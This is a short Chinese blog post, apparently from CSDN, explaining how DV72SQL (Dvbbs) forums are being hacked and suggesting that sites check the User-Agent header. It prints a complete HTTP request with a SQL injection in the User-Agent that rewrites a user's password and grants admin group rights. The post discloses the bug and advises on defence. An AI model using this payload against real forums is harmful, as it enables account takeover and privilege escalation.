DV72SQL的防被黑心得

最新推荐文章于 2023-04-21 09:22:18 发布
最新推荐文章于 2023-04-21 09:22:18 发布
阅读量2.4k 收藏
点赞数
分类专栏: 安全资讯 Web编程 Web技术 文章标签: sql action 服务器 工具 user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/3cts/article/details/154235
版权

近日,有朋友说自己的论坛频频被黑,服务器没有任何的上传组件,已经关闭了FSO.但照样被黑.

也就分析这有可能是DV72SQL版本自身的问题.

据N长时间的较量,朋友得到所谓的攻击方式,其实也无非是借助了桂林老兵写的一个DV72SQL的BUG的利用工具.

提交的数据包内容-----------------

GET /bbs/showerr.asp?BoardID=1&action=OtherErr HTTP/1.1
Referer: http://www.target.com/bbs/showerr.asp?BoardID=1&action=OtherErr
User-Agent: Mozilla/4.0 (compatible;M;M;M;','论坛首页',7,'',2) update Dv_User set UserPassword='4621d373cade4e83',UserGroupID=1 where username='桂林老兵'--Netscape
Host: www.target.com
Cookie:

这些就是即将要攻击的数据.

其实这种东西.只要我们加此检测User-Agent的过程就可以了.
至于如何去写这些代码,相信大家都心中有数了吧?

以后我们在程序的防黑上一定要做足一点.
最好再对提交数据的客户端的环境参数要进行严格的控制.

3cts
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DV6.2 For SQL存储过程版
10-13
《DV6.2 For SQL存储过程版:提升网站性能与数据处理能力》 在IT行业中,数据库管理系统(DBMS)的选择对于网站的性能至关重要。动网先锋的DV6.2 For SQL存储过程版是一个经过精心改良的系统,它将原本基于Access的...
dvhop_dvhop_源码
10-02
【dvhop_dvhop_源码】:这个标题暗示我们关注的是一个名为“dvhop”的软件或算法的源代码。dvhop很可能是一个专为特定计算任务设计的程序,或者是某个编程语言实现的数据处理或分布式计算框架。源代码是程序员用高级...
DVWA之SQL注入漏洞
weixin_56306210的博客
01-30 2451
DVWA之SQL注入漏洞
JAVA代码优化,接口优化,SQL优化 (小技巧)
沉淀、分享、成长,让自己和他人都能有所收获!
08-04 5436
不知道你有没有拼接过字符串,特别是那种有多个参数,字符串比较长的情况。比如现在有个需求:要用get请求调用第三方接口,url后需要拼接多个参数。以前我们的请求地址是这样拼接的: 字符串使用号拼接,非常容易出错。后面优化了一下,改为使用拼接字符串: 代码优化之后,稍微直观点。但还是看起来比较别扭。这时可以使用方法优化: 代码的可读性,一下子提升了很多。我们平常可以使用方法拼接url请求参数,日志打印等字符串。想必大家都使用得比较多,我们经常需要把数据某个文件,或者从某个文件中数据到中,甚至还有可能把文件a,从
读书笔记:SQL 查询中的SQL*Plus 替换变量(DEFINE变量)和参数
In-Memory Computing Technology
06-23 2719
此文主要是讲替换变量,也称为DEFINE变量,但也涉及了绑定变量和SQL Plus系统变量。 这篇文章展示了替换变量如何替换 Oracle SQLSQL*Plus 语句中的硬编码文本。 向作者致敬,尽管是10多年前的文章,但写的非常好和全面,仍具重要参考价值。...
[网络安全]DVWA之SQL注入—medium level解题详析
最新发布
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行转义处理,以SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
dv.rar_dv
09-19
"DV.rar_dv" 文件可能是一个关于DV高级语言程序设计的压缩包,其中包含了学习和理解DV编程的一些关键资源。DV语言可能是一种专门用于特定领域或应用的编程语言,具有高级特性和功能,旨在提高开发效率和代码质量。在...
DV-Hop_dv-hop_
10-03
《DV-Hop算法在无线传感器网络中的应用与实现》 无线传感器网络(Wireless Sensor Network, WSN)是由大量小型传感器节点组成,用于环境监测、目标跟踪等多种应用场景。在WSN中,节点间的通信距离受限,因此需要...
基于麻雀算法优化的DVHop
04-12
matlab代码: 基于麻雀搜索算法改进的DV-HOP算法 内容概要:利用麻雀算法寻找未知节点到信标节点的实际距离与估计距离之间的最小误差,从而达到对未知节点位置的估计。 适合人群:对无线传感器网络(WSN)定位相关...
【vue】element 的el-table,数据刷新,但表格不刷新 终极解决方案
无轩居 (Home of vip)
03-06 7883
vue 2.x 的elment ui this.tableData.splice(1.0) 强制它更新一下就可以了。 要不要,你就算主动去getdata,它也不会更新
关于Tomcat: The value for the useBean class attribute is invalid 问题的另类解释
无轩居 (Home of vip)
05-31 7767
关于Tomcat: The value for the useBean class attribute is invalid 问题大家,或者说高高手通常给的就是如下的解释http://groups.google.com/group/programmercafe/browse_thread/thread/379cf84cd4615203/eeb1f45e2d79bc32但是我本人比较白痴
vue element ui el_upload 一直报跨域问题的解决办法。
无轩居 (Home of vip)
04-25 4488
这几天用 element ui 做后台上传文件的时候。 本来做得好好的。。。 结果 在设置多行传文件的时候,一直 跨域问题。 我就纳闷了,我后端我已经设置了可以跨域问题啊。 而且这个上传路径,还是同一个后端的不同目录罢了。 其他地址都好好的呀。 怎么会一直报跨域呢? 真的是百度了二天,一直没解决, 然后最后只好把好的那部分代码和坏的那部分代码一行一行对比 最后发现和前端代码无关。 因为我切换到正常...
在ASP中实现RsA加密与解密
无轩居 (Home of vip)
01-17 4324
本文章有两文件组成test.asp 测试演示文件clsrsa.asp 实现rsa加密与解密的vbs类文件下面是代码: 1. test.asprem 文章标题:在asp中通过vbs类实现rsa加密与解密rem 收集整理:yanekrem 联系:aspboy@263.net%>Dim LngKeyEDim LngKeyDDim LngKeyNDim StrMessageDim Ob
[收藏]JavaMail - 发送HTML邮件
无轩居 (Home of vip)
01-25 4173
JavaMail - 发送HTML邮件 form.htm ======== 邮件例程 - JavaMail - 发送HTML邮件 SMTP主机: 发信人: 收信人: 抄送人: 暗送人: 主题: 内容: send.jsp ======== 作者:何志强[hhzqq@21cn.com] 日期:2000-08-16 版本
[收藏]java数据类型转换
无轩居 (Home of vip)
01-26 4066
  一些初学JAVA的朋友可能会遇到JAVA的数据类型之间转换的苦恼,例如,整数和float,double型之间的转换,整数和String类型之间的转换,以及处理、显示时间方面的问题等。下面笔者就开发中的一些体会介绍给大家。    我们知道,Java的数据类型分为三大类,即布尔型、字符型和数值型,而其中数值型又分为整型和浮点型;相对于数据类型,Java的变量类型为布尔型boolean;字符型c
关于JSP Commons FileUpload 组件上传文件的一些总结
无轩居 (Home of vip)
04-01 3926
也许好东西就是需要慢慢地去发现和总结的.以前我写的JSP系统都是采用Jsp SmartUpload 组件来解决的.前几天客户投诉说,上传大文件的时候,浏览器无反应,甚至会崩溃.叫我帮忙解决一下并加上上传进度表示(这个暂且不表,有需要的可加我MSN:info@hkeb.com).立即google ,baidu 一下,才知JSp SmartUpload 适用于比较小文件的时候,而如果上传大
[收藏]JSP数据类型
无轩居 (Home of vip)
01-26 3802
数据类型基本类型有以下四种:int长度数据类型有:byte(8bits)、short(16bits)、int(32bits)、long(64bits)、float长度数据类型有:单精度(32bits float)、双精度(64bits double)boolean类型变量的取值有:ture、falsechar数据类型有:unicode字符,16位对应的类类型:Integer、Float、B
C# TCP/IP 初探心得 即P2P点对点通讯研究......
无轩居 (Home of vip)
08-08 3325
很久以前就一直想玩P2P做一些商用的应用软件早前没有C#,或者.NET的时候,我可以用VB6 采用 winsock来开发一些应用软件.距离VB6那个时候已经有近 5年没有玩过了.这几日开了VS2005来玩C#. 翻无数贴子,均不能成功实现C S 之间的通讯.不是死机,就是到处有错.经过俺几天几夜不眠不休的认真研究,最终研究得成正果,小小的爽了一把.为了俺们大中华民族的未来软
TTDV:打造网络DV巨星的互动平台
"虚拟DV社区TTDV网站设计与实现" TTDV网站是一个专注于DV(Digital Video)文化的虚拟社区,它的设计与实现旨在构建一个互动性强、专业化的网络平台,供DV爱好者和表演者展示才华,交流心得,甚至追求成为网络影视...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

3cts

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值